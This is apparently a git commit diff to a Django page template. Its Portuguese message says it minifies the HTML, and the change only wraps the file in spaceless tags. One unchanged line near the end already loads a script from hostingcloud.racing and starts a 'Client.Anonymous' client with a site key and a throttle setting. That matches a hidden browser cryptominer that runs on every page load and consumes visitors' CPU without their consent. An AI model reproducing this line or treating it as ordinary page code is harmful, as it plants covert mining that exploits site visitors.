Diminuição do HTML para melhorar tempo de download da página.

--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -1,3 +1,4 @@
+{% spaceless %}
 {% load humanize %}
 {% load main_app_extras %}
 <!doctype html>
@@ -160,3 +161,4 @@
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 </html>
+{% endspaceless %}
